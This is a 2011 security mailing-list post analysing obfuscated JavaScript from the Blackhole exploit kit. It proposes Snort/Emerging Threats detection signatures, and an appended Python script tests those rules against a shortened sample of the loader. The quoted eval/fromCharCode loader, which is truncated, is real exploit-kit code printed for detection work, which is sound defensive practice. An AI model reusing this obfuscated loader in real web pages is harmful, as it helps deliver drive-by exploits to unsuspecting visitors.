[Emerging-Sigs] Three Proposed Signatures for Unknown Exploit Kit (No current ET coverage)

Chris Wakelin c.d.wakelin at reading.ac.uk
Tue Sep 13 11:24:16 EDT 2011


On 13/09/2011 16:02, Nathan wrote:
> <html><body><script>
> a=document.createElement('div');
> try{{}['qwewqr']();}catch(q){a.innerHTML=- -+new Object(22);}
> if (typeof a.fwevfeerhrwe === 'undefined'){c='f';cc='e';}
> z=[a['innerHTML']];q=+z;
> e=window[cc+'val'];e(String[c+'romChar'+'Co'+'de'](50*2,q+89,49.5*2,q+95,54.5*2,q+79,55*2,q+94,23*2,q+97,57*2,q+83,58*2,q+79,20*2,q+17,30*2,q+77,50.5*2,q+88,58*2,q+79,57*2,q+40,30*2,q+82,24.5*2,q+40,40*2,q+86,50.5*2,q+75,57.5*2,q+79,16*2,q+97,48.5*2,q+83,58*2,q+10,56*2,q+75,51.5*2,q+79,16*2,q+83,57.5*2,q+10,54*2,q+89,48.5*2,q+78,52.5*2,q+88,51.5*2,q+24,23*2,q+24,30*2,q+25,52*2,q+27,31*2,q+38,23.5*2,q+77,50.5*2,q+88,58*2,q+79,57*2,q+40,30*2,q+82,57*2,q+40,19.5*2,q+19,29.5*2,q+-9,5*2,q+-9,5*2,q+80,58.5*2,q+88,49.5*2,q+94,52.5*2,q+89,55*2,q+10,50.5*2,q+88,50*2,q+73,57*2,q+79,50*2,q+83,57*2,q+79,49.5*2,q+94,20*2,q+19,16*2,q+101,62.5*2,q+-9,5*2,q+96,48.5*2,q+92,16*2,q+84,59*2,q+79,57*2,q+10,30.5*2,q+10,45.5*2,q+26,22*2,q+10,24*2,q+22,16*2,q+26,22*2,q+10,24*2,q+71,22*2,q+-9,5*2,q+10,16*2,q+10,16*2,q+90,50*2,q+80,59*2,q+79,57*2,q+10,30.5*2,q+10,45.5*2,q+26,22*2,q+10,24*2,q+22,16*2,q+26,22*2,q+10,24*2,q+71,22*2,q+-9,5*2,q+10,16*2,q+{SNIPPED
> BY NATHAN}
> 

That looks like the latest version of our usual obfuscated Javascript
associated with the Blackhole kit. I was about to suggest another
revision to sig: 2013313 after testing it for a couple of days:

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET TROJAN Obfuscated Javascript Often Used in the Blackhole Exploit Kit 3"; flow:established,from_server; content:"Content-Type|3a 20|text/html"; content:"|0d 0a|<html><body>"; within:500; content:"<script>|0d 0a 09 09 09|"; fast_pattern; within:500; pcre:"/([a-z$+-]{0,4}[0-9.*]+[a-z$+-]{0,4},){24}/R"; classtype:trojan-activity; sid:2013313; rev:5;)

There are a couple of URLs we could sig, but they change from time to
time. E.g. the Java exploit is often delivered as "worms.jar" (used to
be [Gg]ames.jar, mario.jar etc. - see sigs 2013024, 2011324, 2011326)
and I've seen a lot of "main.php?page=[0-9a-f]{16}" recently (as opposed
to ".php?tp=[0-9a-f]{16}") for the obfuscated Javascript page:-

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"RDG Driveby Download Secondary Request #4"; flow:established,to_server; content:"main.php?page="; http_uri; pcre:"/[a-f0-9]{16}$/U"; classtype:trojan-activity; sid:xxxxx; rev:1;)

Best Wishes,
Chris

-- 
--+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+---+-
Christopher Wakelin,                           c.d.wakelin at reading.ac.uk
IT Services Centre, The University of Reading,  Tel: +44 (0)118 378 8439
Whiteknights, Reading, RG6 2AF, UK              Fax: +44 (0)118 975 3094
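As an added illustration (not part of the original thread, and not Emerging Threats' or Snort's own code), the script below emulates the content/within/pcre chain of the proposed sid:2013313 revision and the "main.php?page=" URI rule in plain Python, so the regexes can be checked against samples offline. The HTTP responses and URIs are constructed for the test: the malicious one is a shortened rewrite of the quoted String.fromCharCode argument list with the "<script>|0d 0a 09 09 09|" prefix the rule expects, the benign one is an ordinary page with a short numeric array. Snort's buffer handling is approximated with byte offsets, which is an assumption for demonstration, not a claim about the engine's internals.

```python
import re

# Content matches from sid:2013313 rev:5, decoded from the |hex| notation.
CONTENT_TYPE = b"Content-Type: text/html"
BODY_START = b"\r\n<html><body>"
SCRIPT_START = b"<script>\r\n\t\t\t"
# PCRE from the posted rule, used unchanged; each group is one comma-terminated
# argument such as "50*2," or "q+89," and 24 of them in a row are required.
OBFUSCATED_ARGS = re.compile(rb"([a-z$+-]{0,4}[0-9.*]+[a-z$+-]{0,4},){24}")

# PCRE from the "main.php?page=" rule (the /U flag just selects the URI buffer).
PAGE_HEX_ID = re.compile(rb"[a-f0-9]{16}$")


def matches_sid_2013313(response: bytes) -> bool:
    """Emulate the ordered content/within chain, then apply the PCRE with /R
    semantics (search starts where the last content match ended)."""
    pos = response.find(CONTENT_TYPE)
    if pos < 0:
        return False
    pos += len(CONTENT_TYPE)
    # within:500 -> the next content must lie within 500 bytes of the last match end
    nxt = response.find(BODY_START, pos, pos + 500)
    if nxt < 0:
        return False
    pos = nxt + len(BODY_START)
    nxt = response.find(SCRIPT_START, pos, pos + 500)
    if nxt < 0:
        return False
    pos = nxt + len(SCRIPT_START)
    return OBFUSCATED_ARGS.search(response, pos) is not None


def matches_page_uri(uri: bytes) -> bool:
    """Emulate content:"main.php?page="; http_uri; pcre:"/[a-f0-9]{16}$/U"."""
    return b"main.php?page=" in uri and PAGE_HEX_ID.search(uri) is not None


# Constructed sample modelled on the quoted page (shortened, not the original bytes).
MALICIOUS_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"<html><body><script>\r\n\t\t\t"
    b"a=document.createElement('div');"
    b"e=window[cc+'val'];e(String[c+'romChar'+'Co'+'de']("
    b"50*2,q+89,49.5*2,q+95,54.5*2,q+79,55*2,q+94,23*2,q+97,57*2,q+83,"
    b"58*2,q+79,20*2,q+17,30*2,q+77,50.5*2,q+88,58*2,q+79,57*2,q+40,"
    b"30*2,q+82,24.5*2,q+40,40*2,q+86));"
    b"</script></body></html>"
)

# Constructed benign page: same layout, but only five numeric arguments.
BENIGN_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"<html><body><script>\r\n\t\t\t"
    b"var ids=[1,2,3,4,5];for(var i=0;i<ids.length;i++){}"
    b"</script></body></html>"
)

if __name__ == "__main__":
    print("malicious sample hits sid:2013313:", matches_sid_2013313(MALICIOUS_RESPONSE))
    print("benign sample hits sid:2013313:  ", matches_sid_2013313(BENIGN_RESPONSE))
    print("page URI hit:", matches_page_uri(b"/main.php?page=0123456789abcdef"))
    print("tp URI hit:  ", matches_page_uri(b"/index.php?tp=0123456789abcdef"))
```

The emulation makes the rule's dependencies visible: the fast_pattern content ties the alert to the exact "\r\n\t\t\t" whitespace after "<script>", so a variant with different indentation would need a further revision, and the URI rule is case-sensitive on the hex id because the PCRE carries no /i flag.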

